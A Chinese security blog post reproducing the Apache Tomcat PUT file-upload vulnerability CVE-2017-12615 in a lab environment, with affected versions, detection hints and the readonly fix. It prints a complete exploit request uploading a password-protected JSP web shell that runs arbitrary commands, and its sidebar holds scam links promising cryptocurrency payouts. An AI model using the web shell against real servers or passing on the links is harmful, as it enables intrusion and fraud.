CVE-2017-12615 Apache Tomcat PUT文件上传漏洞复现

4月 7, 2020

CVE-2017-12615 Apache Tomcat PUT文件上传漏洞复现

作者 Zgao 在漏洞复现

文章目录

漏洞简述

Apache Tomcat是美国阿帕奇（Apache）软件基金会下属的Jakarta项目的一款轻量级Web应用服务器，它主要用于开发和调试JSP程序，适用于中小型系统。
Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞，将 readonly 参数设置为 false 时，且启用了 HTTP PUT 请求方法时，攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的JSP文件。

漏洞影响版本

7.0.0 <= tomcat <=7.0.79

漏洞exp

https://github.com/breaktoprotect/CVE-2017-12615

漏洞环境搭建

使用用vulhub进行复现。

默认 readonly 为 true，当 readonly 设置为 false 时，可以通过 PUT / DELETE 进行文件操控。

漏洞复现

虽然tomcat对文件后缀有检测，不能直接上传jsp。但我们使用一些文件系统的特性（如Linux下可用/）来绕过了限制。

PUT /cmd.jsp/ HTTP/1.1
Host: vul.zgao.top:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 288

<% if("zgao".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

上传一句话jsp成功。

溯源排查

配置文件：/usr/local/tomcat/conf/web.xml

日志目录：/usr/local/tomcat/logs

排查关键词：PUT

修复方式

将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true。

Post Views: 1,184

赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日，安全圈的师傅们都能用上Zgao写的工具。

发表评论
取消回复

TRАNSАСТIОN 0.7576 ВTC. Receive >> https://telegra.ph/BTC-Transaction--220039-03-14?hs=74f520bff0accac2043452b515a16264&发表在《Rocket.Chat搭建个人聊天服务器并配置hubot机器人》
Transfer 45 720 Dollars. Gо tо withdrаwаl =>> https://telegra.ph/BTC-Transaction--841255-03-14?hs=0f8a22ffd3db12e6461572c374f5c6b2&发表在《纵享丝滑之用Goland远程开发》
You got 62 151 $. Withdrаw >>> https://telegra.ph/BTC-Transaction--760019-03-14?hs=f9e17adff631e5fde637afeb80f9bb6a&发表在《利用docker快速搭建个性化Google镜像》
Withdrawing 68 164 USD. Gо tо withdrаwаl >>> https://script.google.com/macros/s/AKfycbzzz_WJMvpOeCDPbQtyt1DZNvX36qM6XOzZGtZaUpVIeAyXCbWri7aVITEe4FQpQnXw/exec?hs=d88934b1ef17bce7a057d3b41faa0555&发表在《trojan 443端口被封的简单解决思路》
SЕNDING 1.00 ВТС. Continue > https://script.google.com/macros/s/AKfycbw84CNS4VPq0mN10paf5yaXXyPWjgH_6ObLfABHt8Ha04cdKwL2EWW87GvAwXzZ-c_khw/exec?hs=1b5c7f98175c826a071052c14aade828&发表在《MetaMask从插件文件中恢复助记词》
ТRАNSFЕR 1,000 ВTC. Get > https://script.google.com/macros/s/AKfycby37YAKU1-0f2_W1k3PsPboi48N3-7psJCqUqGIdKmlyFwB5b9HcP7ueYpNEPS_aL_5/exec?hs=a896867443925d66d751fb0d897e0510&发表在《IOS逆向(一)-破解某币app加密数据》
SЕNDING 1.00 ВTC. Receive >> https://script.google.com/macros/s/AKfycbyI203EG8IOqUONZzbK9i3C9XkgDuPu0X22Iwss96YNqtYSXDlpSMs0nJex-biAvZl1Og/exec?hs=f7b41b82967f29a940454ffc5ac396c7&发表在《Apache Spark 未授权访问漏洞复现》
+ 1.00 ВTC. Receive => https://script.google.com/macros/s/AKfycbwYaSTRQuyYi4jvK7cnAMTd9PO04pJlHBS1AV_KfmDbH4jHuX39cWnN6wwZtztqCKE/exec?hs=a875387d22e55f61d03dda7f694a35d9&发表在《关于我》